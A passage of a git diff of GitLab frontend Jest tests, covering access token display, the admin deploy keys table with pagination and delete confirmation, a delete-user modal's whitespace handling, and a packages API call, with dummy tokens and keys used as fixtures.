}; + + const defaultSlots = { + title: 'Feed token title', + description: 'Feed token description', + 'input-description': 'Feed token input description', + }; + + const createComponent = () => { + wrapper = mountExtended(Token, { propsData: defaultPropsData, slots: defaultSlots }); + }; + + afterEach(() => { + wrapper.destroy(); + }); + + it('renders title slot', () => { + createComponent(); + + expect(wrapper.findByText(defaultSlots.title, { selector: 'h4' }).exists()).toBe(true); + }); + + it('renders description slot', () => { + createComponent(); + + expect(wrapper.findByText(defaultSlots.description).exists()).toBe(true); + }); + + it('renders input description slot', () => { + createComponent(); + + expect(wrapper.findByText(defaultSlots['input-description']).exists()).toBe(true); + }); + + it('correctly passes props to `InputCopyToggleVisibility` component', () => { + createComponent(); + + const inputCopyToggleVisibilityComponent = wrapper.findComponent(InputCopyToggleVisibility); + + expect(inputCopyToggleVisibilityComponent.props()).toMatchObject({ + formInputGroupProps: { + id: defaultPropsData.inputId, + }, + value: defaultPropsData.token, + copyButtonTitle: defaultPropsData.copyButtonTitle, + }); + expect(inputCopyToggleVisibilityComponent.attributes()).toMatchObject({ + label: defaultPropsData.inputLabel, + 'label-for': defaultPropsData.inputId, + }); + }); +}); diff --git a/spec/frontend/access_tokens/components/tokens_app_spec.js b/spec/frontend/access_tokens/components/tokens_app_spec.js new file mode 100644 index 00000000000..d7acfbb47eb --- /dev/null +++ b/spec/frontend/access_tokens/components/tokens_app_spec.js @@ -0,0 +1,148 @@ +import { merge } from 'lodash'; + +import { mountExtended, extendedWrapper } from 'helpers/vue_test_utils_helper'; + +import TokensApp from '~/access_tokens/components/tokens_app.vue'; +import { FEED_TOKEN, INCOMING_EMAIL_TOKEN, STATIC_OBJECT_TOKEN } from '~/access_tokens/constants'; + +describe('TokensApp', () => { + let wrapper; + + const defaultProvide = { + tokenTypes: { + [FEED_TOKEN]: { + enabled: true, + token: 'DUKu345VD73Py7zz3z89', + resetPath: '/-/profile/reset_feed_token', + }, + [INCOMING_EMAIL_TOKEN]: { + enabled: true, + token: 'az4a2l5f8ssa0zvdfbhidbzlx', + resetPath: '/-/profile/reset_incoming_email_token', + }, + [STATIC_OBJECT_TOKEN]: { + enabled: true, + token: 'QHXwGHYioHTgxQnAcyZ-', + resetPath: '/-/profile/reset_static_object_token', + }, + }, + }; + + const createComponent = (options = {}) => { + wrapper = mountExtended(TokensApp, merge({}, { provide: defaultProvide }, options)); + }; + + const expectTokenRendered = ({ + testId, + expectedLabel, + expectedDescription, + expectedInputDescription, + expectedResetPath, + expectedResetConfirmMessage, + expectedProps, + }) => { + const container = extendedWrapper(wrapper.findByTestId(testId)); + + expect(container.findByText(expectedLabel, { selector: 'h4' }).exists()).toBe(true); + expect(container.findByText(expectedDescription).exists()).toBe(true); + expect(container.findByText(expectedInputDescription, { exact: false }).exists()).toBe(true); + expect(container.findByText('reset this token').attributes()).toMatchObject({ + 'data-confirm': expectedResetConfirmMessage, + 'data-method': 'put', + href: expectedResetPath, + }); + expect(container.props()).toMatchObject(expectedProps); + }; + + afterEach(() => { + wrapper.destroy(); + }); + + it('renders all enabled tokens', () => { + createComponent(); + + expectTokenRendered({ + testId: TokensApp.htmlAttributes[FEED_TOKEN].containerTestId, + expectedLabel: TokensApp.i18n[FEED_TOKEN].label, + expectedDescription: TokensApp.i18n[FEED_TOKEN].description, + expectedInputDescription: + 'Keep this token secret. Anyone who has it can read activity and issue RSS feeds or your calendar feed as if they were you.', + expectedResetPath: defaultProvide.tokenTypes[FEED_TOKEN].resetPath, + expectedResetConfirmMessage: TokensApp.i18n[FEED_TOKEN].resetConfirmMessage, + expectedProps: { + token: defaultProvide.tokenTypes[FEED_TOKEN].token, + inputId: TokensApp.htmlAttributes[FEED_TOKEN].inputId, + inputLabel: TokensApp.i18n[FEED_TOKEN].label, + copyButtonTitle: TokensApp.i18n[FEED_TOKEN].copyButtonTitle, + }, + }); + + expectTokenRendered({ + testId: TokensApp.htmlAttributes[INCOMING_EMAIL_TOKEN].containerTestId, + expectedLabel: TokensApp.i18n[INCOMING_EMAIL_TOKEN].label, + expectedDescription: TokensApp.i18n[INCOMING_EMAIL_TOKEN].description, + expectedInputDescription: + 'Keep this token secret. Anyone who has it can create issues as if they were you.', + expectedResetPath: defaultProvide.tokenTypes[INCOMING_EMAIL_TOKEN].resetPath, + expectedResetConfirmMessage: TokensApp.i18n[INCOMING_EMAIL_TOKEN].resetConfirmMessage, + expectedProps: { + token: defaultProvide.tokenTypes[INCOMING_EMAIL_TOKEN].token, + inputId: TokensApp.htmlAttributes[INCOMING_EMAIL_TOKEN].inputId, + inputLabel: TokensApp.i18n[INCOMING_EMAIL_TOKEN].label, + copyButtonTitle: TokensApp.i18n[INCOMING_EMAIL_TOKEN].copyButtonTitle, + }, + }); + + expectTokenRendered({ + testId: TokensApp.htmlAttributes[STATIC_OBJECT_TOKEN].containerTestId, + expectedLabel: TokensApp.i18n[STATIC_OBJECT_TOKEN].label, + expectedDescription: TokensApp.i18n[STATIC_OBJECT_TOKEN].description, + expectedInputDescription: + 'Keep this token secret. Anyone who has it can access repository static objects as if they were you.', + expectedResetPath: defaultProvide.tokenTypes[STATIC_OBJECT_TOKEN].resetPath, + expectedResetConfirmMessage: TokensApp.i18n[STATIC_OBJECT_TOKEN].resetConfirmMessage, + expectedProps: { + token: defaultProvide.tokenTypes[STATIC_OBJECT_TOKEN].token, + inputId: TokensApp.htmlAttributes[STATIC_OBJECT_TOKEN].inputId, + inputLabel: TokensApp.i18n[STATIC_OBJECT_TOKEN].label, + copyButtonTitle: TokensApp.i18n[STATIC_OBJECT_TOKEN].copyButtonTitle, + }, + }); + }); + + it("doesn't render disabled tokens", () => { + createComponent({ + provide: { + tokenTypes: { + [FEED_TOKEN]: { + enabled: false, + }, + }, + }, + }); + + expect( + wrapper.findByTestId(TokensApp.htmlAttributes[FEED_TOKEN].containerTestId).exists(), + ).toBe(false); + }); + + describe('when there are tokens missing an `i18n` definition', () => { + it('renders without errors', () => { + createComponent({ + provide: { + tokenTypes: { + fooBar: { + enabled: true, + token: 'rewjoa58dfm54jfkdlsdf', + resetPath: '/-/profile/foo_bar', + }, + }, + }, + }); + + expect( + wrapper.findByTestId(TokensApp.htmlAttributes[FEED_TOKEN].containerTestId).exists(), + ).toBe(true); + }); + }); +}); diff --git a/spec/frontend/admin/analytics/devops_score/components/devops_score_spec.js b/spec/frontend/admin/analytics/devops_score/components/devops_score_spec.js index 824eb033671..14f94e671a4 100644 --- a/spec/frontend/admin/analytics/devops_score/components/devops_score_spec.js +++ b/spec/frontend/admin/analytics/devops_score/components/devops_score_spec.js @@ -1,4 +1,4 @@ -import { GlTable, GlBadge, GlEmptyState } from '@gitlab/ui'; +import { GlTableLite, GlBadge, GlEmptyState } from '@gitlab/ui'; import { GlSingleStat } from '@gitlab/ui/dist/charts'; import { mount } from '@vue/test-utils'; import { extendedWrapper } from 'helpers/vue_test_utils_helper'; @@ -20,7 +20,7 @@ describe('DevopsScore', () => { ); }; - const findTable = () => wrapper.findComponent(GlTable); + const findTable = () => wrapper.findComponent(GlTableLite); const findEmptyState = () => wrapper.findComponent(GlEmptyState); const findCol = (testId) => findTable().find(`[data-testid="${testId}"]`); const findUsageCol = () => findCol('usageCol'); @@ -44,7 +44,7 @@ describe('DevopsScore', () => { }); it('displays the correct message', () => { - expect(findEmptyState().text()).toBe( + expect(findEmptyState().text().replace(/\s+/g, ' ')).toBe( 'Data is still calculating... It may be several days before you see feature usage data. See example DevOps Score page in our documentation.', ); }); @@ -124,11 +124,11 @@ describe('DevopsScore', () => { describe('table columns', () => { describe('Your usage', () => { - it('displays the corrrect value', () => { + it('displays the correct value', () => { expect(findUsageCol().text()).toContain('3.2'); }); - it('displays the corrrect badge', () => { + it('displays the correct badge', () => { const badge = findUsageCol().find(GlBadge); expect(badge.exists()).toBe(true); diff --git a/spec/frontend/admin/deploy_keys/components/table_spec.js b/spec/frontend/admin/deploy_keys/components/table_spec.js index 3b3be488043..49bda7100fb 100644 --- a/spec/frontend/admin/deploy_keys/components/table_spec.js +++ b/spec/frontend/admin/deploy_keys/components/table_spec.js @@ -1,8 +1,19 @@ import { merge } from 'lodash'; -import { GlTable, GlButton } from '@gitlab/ui'; +import { GlLoadingIcon, GlEmptyState, GlPagination, GlModal } from '@gitlab/ui'; +import { nextTick } from 'vue'; +import responseBody from 'test_fixtures/api/deploy_keys/index.json'; import { mountExtended } from 'helpers/vue_test_utils_helper'; +import waitForPromises from 'helpers/wait_for_promises'; +import { stubComponent } from 'helpers/stub_component'; import DeployKeysTable from '~/admin/deploy_keys/components/table.vue'; +import TimeAgoTooltip from '~/vue_shared/components/time_ago_tooltip.vue'; +import Api, { DEFAULT_PER_PAGE } from '~/api'; +import createFlash from '~/flash'; + +jest.mock('~/api'); +jest.mock('~/flash'); +jest.mock('~/lib/utils/csrf', () => ({ token: 'mock-csrf-token' })); describe('DeployKeysTable', () => { let wrapper; @@ -14,9 +25,60 @@ describe('DeployKeysTable', () => { emptyStateSvgPath: '/assets/illustrations/empty-state/empty-deploy-keys.svg', }; + const deployKey = responseBody[0]; + const deployKey2 = responseBody[1]; + const createComponent = (provide = {}) => { wrapper = mountExtended(DeployKeysTable, { provide: merge({}, defaultProvide, provide), + stubs: { + GlModal: stubComponent(GlModal, { + template: ` + <div> + <slot name="modal-title"></slot> + <slot></slot> + <slot name="modal-footer"></slot> + </div>`, + }), + }, + }); + }; + + const findEditButton = (index) => + wrapper.findAllByLabelText(DeployKeysTable.i18n.edit, { selector: 'a' }).at(index); + const findRemoveButton = (index) => + wrapper.findAllByLabelText(DeployKeysTable.i18n.delete, { selector: 'button' }).at(index); + const findLoadingIcon = () => wrapper.findComponent(GlLoadingIcon); + const findTimeAgoTooltip = (index) => wrapper.findAllComponents(TimeAgoTooltip).at(index); + const findPagination = () => wrapper.findComponent(GlPagination); + + const expectDeployKeyIsRendered = (expectedDeployKey, expectedRowIndex) => { + const editButton = findEditButton(expectedRowIndex); + const timeAgoTooltip = findTimeAgoTooltip(expectedRowIndex); + + expect(wrapper.findByText(expectedDeployKey.title).exists()).toBe(true); + expect(wrapper.findByText(expectedDeployKey.fingerprint, { selector: 'code' }).exists()).toBe( + true, + ); + expect(timeAgoTooltip.exists()).toBe(true); + expect(timeAgoTooltip.props('time')).toBe(expectedDeployKey.created_at); + expect(editButton.exists()).toBe(true); + expect(editButton.attributes('href')).toBe(`/admin/deploy_keys/${expectedDeployKey.id}/edit`); + expect(findRemoveButton(expectedRowIndex).exists()).toBe(true); + }; + + const itRendersTheEmptyState = () => { + it('renders empty state', () => { + const emptyState = wrapper.findComponent(GlEmptyState); + + expect(emptyState.exists()).toBe(true); + expect(emptyState.props()).toMatchObject({ + svgPath: defaultProvide.emptyStateSvgPath, + title: DeployKeysTable.i18n.emptyStateTitle, + description: DeployKeysTable.i18n.emptyStateDescription, + primaryButtonText: DeployKeysTable.i18n.newDeployKeyButtonText, + primaryButtonLink: defaultProvide.createPath, + }); }); }; @@ -30,18 +92,149 @@ describe('DeployKeysTable', () => { expect(wrapper.findByText(DeployKeysTable.i18n.pageTitle).exists()).toBe(true); }); - it('renders table', () => { + it('renders `New deploy key` button', () => { createComponent(); - expect(wrapper.findComponent(GlTable).exists()).toBe(true); + const newDeployKeyButton = wrapper.findByTestId('new-deploy-key-button'); + + expect(newDeployKeyButton.exists()).toBe(true); + expect(newDeployKeyButton.attributes('href')).toBe(defaultProvide.createPath); + }); + + describe('when `/deploy_keys` API request is pending', () => { + beforeEach(() => { + Api.deployKeys.mockImplementation(() => new Promise(() => {})); + }); + + it('shows loading icon', async () => { + createComponent(); + + await nextTick(); + + expect(findLoadingIcon().exists()).toBe(true); + }); }); - it('renders `New deploy key` button', () => { - createComponent(); + describe('when `/deploy_keys` API request is successful', () => { + describe('when there are deploy keys', () => { + beforeEach(() => { + Api.deployKeys.mockResolvedValue({ + data: responseBody, + headers: { 'x-total': `${responseBody.length}` }, + }); - const newDeployKeyButton = wrapper.findComponent(GlButton); + createComponent(); + }); - expect(newDeployKeyButton.text()).toBe(DeployKeysTable.i18n.newDeployKeyButtonText); - expect(newDeployKeyButton.attributes('href')).toBe(defaultProvide.createPath); + it('renders deploy keys in table', () => { + expectDeployKeyIsRendered(deployKey, 0); + expectDeployKeyIsRendered(deployKey2, 1); + }); + + describe('when delete button is clicked', () => { + it('asks user to confirm', async () => { + await findRemoveButton(0).trigger('click'); + + const modal = wrapper.findComponent(GlModal); + const form = modal.find('form'); + const submitSpy = jest.spyOn(form.element, 'submit'); + + expect(modal.props('visible')).toBe(true); + expect(form.attributes('action')).toBe(`/admin/deploy_keys/${deployKey.id}`); + expect(form.find('input[name="_method"]').attributes('value')).toBe('delete'); + expect(form.find('input[name="authenticity_token"]').attributes('value')).toBe( + 'mock-csrf-token', + ); + + modal.vm.$emit('primary'); + + expect(submitSpy).toHaveBeenCalled(); + }); + }); + }); + + describe('pagination', () => { + beforeEach(() => { + Api.deployKeys.mockResolvedValueOnce({ + data: [deployKey], + headers: { 'x-total': '2' }, + }); + + createComponent(); + }); + + it('renders pagination', () => { + const pagination = findPagination(); + expect(pagination.exists()).toBe(true); + expect(pagination.props()).toMatchObject({ + value: 1, + perPage: DEFAULT_PER_PAGE, + totalItems: responseBody.length, + nextText: DeployKeysTable.i18n.pagination.next, + prevText: DeployKeysTable.i18n.pagination.prev, + align: 'center', + }); + }); + + describe('when pagination is changed', () => { + it('calls API with `page` parameter', async () => { + const pagination = findPagination(); + expectDeployKeyIsRendered(deployKey, 0); + + Api.deployKeys.mockResolvedValue({ + data: [deployKey2], + headers: { 'x-total': '2' }, + }); + + pagination.vm.$emit('input', 2); + + await nextTick(); + + expect(findLoadingIcon().exists()).toBe(true); + expect(pagination.exists()).toBe(false); + + await waitForPromises(); + + expect(Api.deployKeys).toHaveBeenCalledWith({ + page: 2, + public: true, + }); + expectDeployKeyIsRendered(deployKey2, 0); + }); + }); + }); + + describe('when there are no deploy keys', () => { + beforeEach(() => { + Api.deployKeys.mockResolvedValue({ + data: [], + headers: { 'x-total': '0' }, + }); + + createComponent(); + }); + + itRendersTheEmptyState(); + }); + }); + + describe('when `deploy_keys` API request is unsuccessful', () => { + const error = new Error('Network Error'); + + beforeEach(() => { + Api.deployKeys.mockRejectedValue(error); + + createComponent(); + }); + + itRendersTheEmptyState(); + + it('displays flash', () => { + expect(createFlash).toHaveBeenCalledWith({ + message: DeployKeysTable.i18n.apiErrorMessage, + captureError: true, + error, + }); + }); }); }); diff --git a/spec/frontend/admin/statistics_panel/components/app_spec.js b/spec/frontend/admin/statistics_panel/components/app_spec.js index 9c424491d04..3cfb6feeb86 100644 --- a/spec/frontend/admin/statistics_panel/components/app_spec.js +++ b/spec/frontend/admin/statistics_panel/components/app_spec.js @@ -1,6 +1,7 @@ import { GlLoadingIcon } from '@gitlab/ui'; -import { createLocalVue, shallowMount } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; import AxiosMockAdapter from 'axios-mock-adapter'; +import Vue from 'vue'; import Vuex from 'vuex'; import StatisticsPanelApp from '~/admin/statistics_panel/components/app.vue'; import statisticsLabels from '~/admin/statistics_panel/constants'; @@ -9,8 +10,7 @@ import axios from '~/lib/utils/axios_utils'; import { convertObjectPropsToCamelCase } from '~/lib/utils/common_utils'; import mockStatistics from '../mock_data'; -const localVue = createLocalVue(); -localVue.use(Vuex); +Vue.use(Vuex); describe('Admin statistics app', () => { let wrapper; @@ -19,7 +19,6 @@ describe('Admin statistics app', () => { const createComponent = () => { wrapper = shallowMount(StatisticsPanelApp, { - localVue, store, }); }; diff --git a/spec/frontend/admin/users/components/actions/actions_spec.js b/spec/frontend/admin/users/components/actions/actions_spec.js index 67dcf5c6149..fa485e73999 100644 --- a/spec/frontend/admin/users/components/actions/actions_spec.js +++ b/spec/frontend/admin/users/components/actions/actions_spec.js @@ -1,7 +1,7 @@ import { GlDropdownItem } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; -import { kebabCase } from 'lodash'; import { nextTick } from 'vue'; +import { kebabCase } from 'lodash'; import Actions from '~/admin/users/components/actions'; import SharedDeleteAction from '~/admin/users/components/actions/shared/shared_delete_action.vue'; import { capitalizeFirstCharacter } from '~/lib/utils/text_utility'; @@ -39,9 +39,6 @@ describe('Action components', () => { }); await nextTick(); - - expect(wrapper.attributes('data-path')).toBe('/test'); - expect(wrapper.attributes('data-modal-attributes')).toContain('John Doe'); expect(findDropdownItem().exists()).toBe(true); }); }); @@ -66,7 +63,6 @@ describe('Action components', () => { }); await nextTick(); - const sharedAction = wrapper.find(SharedDeleteAction); expect(sharedAction.attributes('data-block-user-url')).toBe(paths.block); @@ -76,6 +72,7 @@ describe('Action components', () => { expect(sharedAction.attributes('data-user-deletion-obstacles')).toBe( JSON.stringify(userDeletionObstacles), ); + expect(findDropdownItem().exists()).toBe(true); }, ); diff --git a/spec/frontend/admin/users/components/modals/__snapshots__/delete_user_modal_spec.js.snap b/spec/frontend/admin/users/components/modals/__snapshots__/delete_user_modal_spec.js.snap index 472158a9b10..7a17ef2cc6c 100644 --- a/spec/frontend/admin/users/components/modals/__snapshots__/delete_user_modal_spec.js.snap +++ b/spec/frontend/admin/users/components/modals/__snapshots__/delete_user_modal_spec.js.snap @@ -78,3 +78,83 @@ exports[`User Operation confirmation modal renders modal with form included 1`] </gl-button-stub> </div> `; + +exports[`User Operation confirmation modal when user's name has leading and trailing whitespace displays user's name without whitespace 1`] = ` +<div> + <p> + content + </p> + + <user-deletion-obstacles-list-stub + obstacles="schedule1,policy1" + username="John Smith" + /> + + <p> + To confirm, type + <code + class="gl-white-space-pre-wrap" + > + John Smith + </code> + </p> + + <form + action="delete-url" + method="post" + > + <input + name="_method" + type="hidden" + value="delete" + /> + + <input + name="authenticity_token" + type="hidden" + value="csrf" + /> + + <gl-form-input-stub + autocomplete="off" + autofocus="" + name="username" + type="text" + value="" + /> + </form> + <gl-button-stub + buttontextclasses="" + category="primary" + icon="" + size="medium" + variant="default" + > + Cancel + </gl-button-stub> + + <gl-button-stub + buttontextclasses="" + category="secondary" + disabled="true" + icon="" + size="medium" + variant="danger" + > + + secondaryAction + + </gl-button-stub> + + <gl-button-stub + buttontextclasses="" + category="primary" + disabled="true" + icon="" + size="medium" + variant="danger" + > + action + </gl-button-stub> +</div> +`; diff --git a/spec/frontend/admin/users/components/modals/delete_user_modal_spec.js b/spec/frontend/admin/users/components/modals/delete_user_modal_spec.js index 82307c9e3b3..025ae825e0d 100644 --- a/spec/frontend/admin/users/components/modals/delete_user_modal_spec.js +++ b/spec/frontend/admin/users/components/modals/delete_user_modal_spec.js @@ -1,4 +1,4 @@ -import { GlButton, GlFormInput } from '@gitlab/ui'; +import { GlButton, GlFormInput, GlSprintf } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import DeleteUserModal from '~/admin/users/components/modals/delete_user_modal.vue'; import UserDeletionObstaclesList from '~/vue_shared/components/user_deletion_obstacles/user_deletion_obstacles_list.vue'; @@ -35,7 +35,7 @@ describe('User Operation confirmation modal', () => { const badUsername = 'bad_username'; const userDeletionObstacles = '["schedule1", "policy1"]'; - const createComponent = (props = {}) => { + const createComponent = (props = {}, stubs = {}) => { wrapper = shallowMount(DeleteUserModal, { propsData: { username, @@ -51,6 +51,7 @@ describe('User Operation confirmation modal', () => { }, stubs: { GlModal: ModalStub, + ...stubs, }, }); }; @@ -150,6 +151,30 @@ describe('User Operation confirmation modal', () => { }); }); + describe("when user's name has leading and trailing whitespace", () => { + beforeEach(() => { + createComponent( + { + username: ' John Smith ', + }, + { GlSprintf }, + ); + }); + + it("displays user's name without whitespace", () => { + expect(wrapper.element).toMatchSnapshot(); + }); + + it("shows enabled buttons when user's name is entered without whitespace", async () => { + setUsername('John Smith'); + + await wrapper.vm.$nextTick(); + + expect(findPrimaryButton().attributes('disabled')).toBeUndefined(); + expect(findSecondaryButton().attributes('disabled')).toBeUndefined(); + }); + }); + describe('Related user-deletion-obstacles list', () => { it('does NOT render the list when user has no related obstacles', () => { createComponent({ userDeletionObstacles: '[]' }); diff --git a/spec/frontend/admin/users/components/users_table_spec.js b/spec/frontend/admin/users/components/users_table_spec.js index 708c9e1979e..9ff5961c7ec 100644 --- a/spec/frontend/admin/users/components/users_table_spec.js +++ b/spec/frontend/admin/users/components/users_table_spec.js @@ -1,5 +1,5 @@ import { GlTable, GlSkeletonLoader } from '@gitlab/ui'; -import { createLocalVue } from '@vue/test-utils'; +import Vue from 'vue'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; @@ -16,8 +16,7 @@ import { users, paths, createGroupCountResponse } from '../mock_data'; jest.mock('~/flash'); -const localVue = createLocalVue(); -localVue.use(VueApollo); +Vue.use(VueApollo); describe('AdminUsersTable component', () => { let wrapper; @@ -48,7 +47,6 @@ describe('AdminUsersTable component', () => { const initComponent = (props = {}, resolverMock = fetchGroupCountsResponse) => { wrapper = mountExtended(AdminUsersTable, { - localVue, apolloProvider: createMockApolloProvider(resolverMock), propsData: { users, diff --git a/spec/frontend/alerts_settings/components/__snapshots__/alerts_form_spec.js.snap b/spec/frontend/alerts_settings/components/__snapshots__/alerts_form_spec.js.snap index f4d3fd97fd8..ec5b6a5597b 100644 --- a/spec/frontend/alerts_settings/components/__snapshots__/alerts_form_spec.js.snap +++ b/spec/frontend/alerts_settings/components/__snapshots__/alerts_form_spec.js.snap @@ -12,6 +12,7 @@ exports[`Alert integration settings form default state should match the default <gl-form-group-stub class="gl-pl-0" labeldescription="" + optionaltext="(optional)" > <gl-form-checkbox-stub checked="true" @@ -28,6 +29,7 @@ exports[`Alert integration settings form default state should match the default label-for="alert-integration-settings-issue-template" label-size="sm" labeldescription="" + optionaltext="(optional)" > <label class="gl-display-inline-flex" @@ -83,6 +85,7 @@ exports[`Alert integration settings form default state should match the default <gl-form-group-stub class="gl-pl-0 gl-mb-5" labeldescription="" + optionaltext="(optional)" > <gl-form-checkbox-stub> <span> @@ -94,6 +97,7 @@ exports[`Alert integration settings form default state should match the default <gl-form-group-stub class="gl-pl-0 gl-mb-5" labeldescription="" + optionaltext="(optional)" > <gl-form-checkbox-stub checked="true" diff --git a/spec/frontend/alerts_settings/components/mocks/apollo_mock.js b/spec/frontend/alerts_settings/components/mocks/apollo_mock.js index 828580a436b..e7ad2cd1d2a 100644 --- a/spec/frontend/alerts_settings/components/mocks/apollo_mock.js +++ b/spec/frontend/alerts_settings/components/mocks/apollo_mock.js @@ -34,6 +34,7 @@ export const updatePrometheusVariables = { export const getIntegrationsQueryResponse = { data: { project: { + id: '1', alertManagementIntegrations: { nodes: [ { diff --git a/spec/frontend/analytics/usage_trends/components/usage_trends_count_chart_spec.js b/spec/frontend/analytics/usage_trends/components/usage_trends_count_chart_spec.js index 7c2df3fe8c4..1a331100bb8 100644 --- a/spec/frontend/analytics/usage_trends/components/usage_trends_count_chart_spec.js +++ b/spec/frontend/analytics/usage_trends/components/usage_trends_count_chart_spec.js @@ -1,6 +1,7 @@ import { GlAlert } from '@gitlab/ui'; import { GlLineChart } from '@gitlab/ui/dist/charts'; -import { createLocalVue, shallowMount } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import UsageTrendsCountChart from '~/analytics/usage_trends/components/usage_trends_count_chart.vue'; @@ -9,8 +10,7 @@ import ChartSkeletonLoader from '~/vue_shared/components/resizable_chart/skeleto import { mockQueryResponse, mockApolloResponse } from '../apollo_mock_data'; import { mockCountsData1 } from '../mock_data'; -const localVue = createLocalVue(); -localVue.use(VueApollo); +Vue.use(VueApollo); const loadChartErrorMessage = 'My load error message'; const noDataMessage = 'My no data message'; @@ -39,7 +39,6 @@ describe('UsageTrendsCountChart', () => { const createComponent = ({ responseHandler }) => { return shallowMount(UsageTrendsCountChart, { - localVue, apolloProvider: createMockApollo([[statsQuery, responseHandler]]), propsData: { ...mockChartConfig }, }); diff --git a/spec/frontend/analytics/usage_trends/components/users_chart_spec.js b/spec/frontend/analytics/usage_trends/components/users_chart_spec.js index 6adfcca11ac..04ea25a02d5 100644 --- a/spec/frontend/analytics/usage_trends/components/users_chart_spec.js +++ b/spec/frontend/analytics/usage_trends/components/users_chart_spec.js @@ -1,6 +1,7 @@ import { GlAlert } from '@gitlab/ui'; import { GlAreaChart } from '@gitlab/ui/dist/charts'; -import { createLocalVue, shallowMount } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import UsersChart from '~/analytics/usage_trends/components/users_chart.vue'; @@ -13,8 +14,7 @@ import { roundedSortedCountsMonthlyChartData2, } from '../mock_data'; -const localVue = createLocalVue(); -localVue.use(VueApollo); +Vue.use(VueApollo); describe('UsersChart', () => { let wrapper; @@ -34,7 +34,6 @@ describe('UsersChart', () => { endDate: new Date(2020, 10, 1), totalDataPoints: mockCountsData2.length, }, - localVue, apolloProvider: createMockApollo([[usersQuery, queryHandler]]), data() { return { loadingError }; diff --git a/spec/frontend/api/packages_api_spec.js b/spec/frontend/api/packages_api_spec.js new file mode 100644 index 00000000000..3286dccb1b2 --- /dev/null +++ b/spec/frontend/api/packages_api_spec.js @@ -0,0 +1,53 @@ +import MockAdapter from 'axios-mock-adapter'; +import { publishPackage } from '~/api/packages_api'; +import axios from '~/lib/utils/axios_utils'; +import httpStatus from '~/lib/utils/http_status'; + +describe('Api', () => { + const dummyApiVersion = 'v3000'; + const dummyUrlRoot = '/gitlab'; + const dummyGon = { + api_version: dummyApiVersion, + relative_url_root: dummyUrlRoot, + }; + let originalGon; + let mock; + + beforeEach(() => { + mock = new MockAdapter(axios); + originalGon = window.gon; + window.gon = { ...dummyGon }; + }); + + afterEach(() => { + mock.restore(); + window.gon = originalGon; + }); + + describe('packages', () => { + const projectPath = 'project_a'; + const name = 'foo'; + const packageVersion = '0'; + const apiResponse = [{ id: 1, name: 'foo' }]; + + describe('publishPackage', () => { + it('publishes the package', () => { + const expectedUrl = `${dummyUrlRoot}/api/${dummyApiVersion}/projects/${projectPath}/packages/generic/${name}/${packageVersion}/${name}`; + + jest.spyOn(axios, 'put'); + mock.onPut(expectedUrl).replyOnce(httpStatus.OK, apiResponse); + + return publishPackage( + { projectPath, name, version: 0, fileName: name, files: [{}] }, + { status: 'hidden', select: 'package_file' }, + ).then(({ data }) => { + expect(data).toEqual(apiResponse); + expect(axios.put).toHaveBeenCalledWith(expectedUrl, expect.any(FormData), { + headers: { 'Content-Type': 'multipart/form-data' }, + params: { select: 'package_file', status: 'hidden' }, + }); + }); + }); + }); + }); +}); diff --git a/spec/frontend/api_spec.js b/spec/frontend/api_spec.js index c3e5a2973d7..75faf6d66fa 100644 --- a/spec/frontend/api_spec.js +++ b/spec/frontend/api_spec.js @@ -1,5 +1,5 @@ import MockAdapter from 'axios-mock-adapter'; -import Api from '~/api'; +import Api, { DEFAULT_PER_PAGE } from '~/api'; import axios from '~/lib/utils/axios_utils'; import httpStatus from '~/lib/utils/http_status'; @@ -1574,6 +1574,51 @@ describe('Api', () => { }); }); + describe('deployKeys', () => { + it('fetches deploy keys', async () => { + const deployKeys = [ + { + id: 7, + title: 'My title 1', + created_at: '2021-10-29T16:59:55.229Z', + expires_at: null, + key: + 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDLvQzRX960N7dxPdge9o5a96+M4GEGQ7rxT2D3wAQDtQFjQV5ZcKb5wfeLtYLe3kRVI4lCO10PXeQppb1XBaYmVO31IaRkcgmMEPVyfp76Dp4CJZz6aMEbbcqfaHkDre0Fa8kzTXnBJVh2NeDbBfGMjFM5NRQLhKykodNsepO6dQ== dummy@gitlab.com', + fingerprint: '81:93:63:b9:1e:24:a2:aa:e0:87:d3:3f:42:81:f2:c2', + projects_with_write_access: [ + { + id: 11, + description: null, + name: 'project1', + name_with_namespace: 'John Doe3 / project1', + path: 'project1', + path_with_namespace: 'namespace1/project1', + created_at: '2021-10-29T16:59:54.668Z', + }, + { + id: 12, + description: null, + name: 'project2', + name_with_namespace: 'John Doe4 / project2', + path: 'project2', + path_with_namespace: 'namespace2/project2', + created_at: '2021-10-29T16:59:55.116Z', + }, + ], + }, + ]; + + const expectedUrl = `${dummyUrlRoot}/api/${dummyApiVersion}/deploy_keys`; + mock.onGet(expectedUrl).reply(httpStatus.OK, deployKeys); + + const params = { page: 2, public: true }; + const { data } = await Api.deployKeys(params); + + expect(data).toEqual(deployKeys); + expect(mock.history.get[0].params).toEqual({ ...params, per_page: DEFAULT_PER_PAGE }); + }); + }); + describe('Feature Flag User List', () => { let expectedUrl; let projectId; diff --git a/spec/frontend/artifacts_settings/components/keep_latest_artifact_checkbox_spec.js b/spec/frontend/artifacts_settings/components/keep_latest_artifact_checkbox_spec.js index b0d1b70c198..bfa8274f0eb 100644 --- a/spec/frontend/artifacts_settings/components/keep_latest_artifact_checkbox_spec.js +++ b/spec/frontend/artifacts_settings/components/keep_latest_artifact_checkbox_spec.js @@ -13,6 +13,7 @@ localVue.use(VueApollo); const keepLatestArtifactProjectMock = { data: { project: { + id: '1', ciCdSettings: { keepLatestArtifact: true }, }, }, diff --git a/spec/frontend/awards_handler_spec.js b/spec/frontend/awards_handler_spec.js index 09270174674..c4002ec11f3 100644 --- a/spec/frontend/awards_handler_spec.js +++ b/spec/frontend/awards_handler_spec.js @@ -1,15 +1,12 @@ -import MockAdapter from 'axios-mock-adapter'; import $ from 'jquery'; import Cookies from 'js-cookie'; +import { initEmojiMock, clearEmojiMock } from 'helpers/emoji'; import { useFakeRequestAnimationFrame } from 'helpers/fake_request_animation_frame'; import loadAwardsHandler from '~/awards_handler'; -import { 